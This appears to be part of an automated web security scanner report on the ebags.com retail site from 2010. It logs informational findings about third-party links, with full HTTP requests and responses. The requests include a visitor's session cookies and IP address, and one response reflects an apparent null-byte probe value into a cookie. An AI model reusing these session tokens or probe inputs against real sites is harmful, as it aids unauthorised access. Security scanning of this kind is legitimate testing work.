<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.8. http://www.ebags.com/info/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/info/index.cfm?fuseaction=contact

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/20100419_OldLiveChat_Button.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&imageURL=https://a248.e.akamai.net/f/248/124/4h/images.ebags.com/img/Header/LivePerson/reponline.gif
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /info/index.cfm?fuseaction=contact HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:38 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:38 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 50424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
</strong>   
<a class="footertxt" id="_lpChatBtn1" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&imageURL=https://a248.e.akamai.net/f/248/124/4h/images.ebags.com/img/Header/LivePerson/reponline.gif' target='chat16136262' onClick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&imageURL=https://a248.e.akamai.net/f/248/124/4h/images.ebags.com/img/Header/LivePerson/reponline.gif&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;" ><strong>
...[SNIP]...
</a> with a customer care agent.<a class="footertxt" id="_lpChatBtn1" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&imageURL=https://a248.e.akamai.net/f/248/124/4h/images.ebags.com/img/Header/LivePerson/reponline.gif' target='chat16136262' onClick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&imageURL=https://a248.e.akamai.net/f/248/124/4h/images.ebags.com/img/Header/LivePerson/reponline.gif&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;" ><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/20100419_OldLiveChat_Button.gif" alt="Live Chat" border="0"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.9. http://www.ebags.com/info/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/info/index.cfm?Fuseaction=overview

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_br.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_cj.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_js.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_s.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_tnf.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_v.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_triangle.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_affiliate.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_affiliate2.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_10549.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_579.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.cj.com/
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://signup.cj.com/member/brandedPublisherSignUp.do?air_refmerchantid=1206555
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /info/index.cfm?Fuseaction=overview HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:02 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=%00728AB%20A%3DB%20F28F1F31AC3; expires=Sun, 02-Jan-2011 14:19:02 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<td>
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_triangle.gif" width=5 height=8>
</td>
...[SNIP]...
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8></td>
...[SNIP]...
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8></td>
<td align="left"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8> <a href="/info/index.cfm?Fuseaction=amb_structure">
...[SNIP]...
<td align="left"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8> <a href="/info/index.cfm?Fuseaction=agreement">
...[SNIP]...
<td align="left"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8> <a href="/info/index.cfm?Fuseaction=amb_faqs">
...[SNIP]...
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8></td>
...[SNIP]...
</table>
<a href="https://signup.cj.com/member/brandedPublisherSignUp.do?air_refmerchantid=1206555"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_affiliate2.gif" border="0" vspace="10"></a>
...[SNIP]...
<br><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_js.gif" border="0" width="82" height="20" alt="JanSport">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_s.gif" border="0" width="45" height="36" alt="Samsonite">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_10549.gif" border="0" alt="Cole Haan">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_tnf.gif" border="0" width="41" height="39" alt="The North Face">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_579.gif" border="0" alt="Nike">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_v.gif" border="0" width="116" height="22" alt="Victorinox by Swiss Army">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_br.gif" border="0" width="105" height="32" alt="Briggs & Riley"><br>
...[SNIP]...
</h2>
eBags has partnered with Commission Junction, the leading solution provider to host our partner program. Visit <a href="http://www.CJ.com">CJ.com</a>
...[SNIP]...
<p><a href="https://signup.cj.com/member/brandedPublisherSignUp.do?air_refmerchantid=1206555"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_affiliate.gif" alt="Sign Up For eBags Partner Program" vspace="5" border="0"></a>
<br><a href="http://www.CJ.com"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_cj.gif" WIDTH="242" height="41" alt="Commission Junction" border="0"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.10. http://www.ebags.com/info/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/info/index.cfm?FuseAction=security

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://medals.bizrate.com/medals/dynamic/18522_medal.gif
http://twitter.com/eBagsOnline
http://www.bizrate.com/ratings_guide/cust_reviews__mid--18522.html
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /info/index.cfm?FuseAction=security HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 44114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<td bgcolor="#cccccc"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0" hspace="10"></a>
...[SNIP]...

<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--18522.html" target="http://www.bizrate.com">
<img src="http://medals.bizrate.com/medals/dynamic/18522_medal.gif" alt="BizRate Customer Certified (GOLD) Site" width="125" height="73" align="top" border="0" target="_blank"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
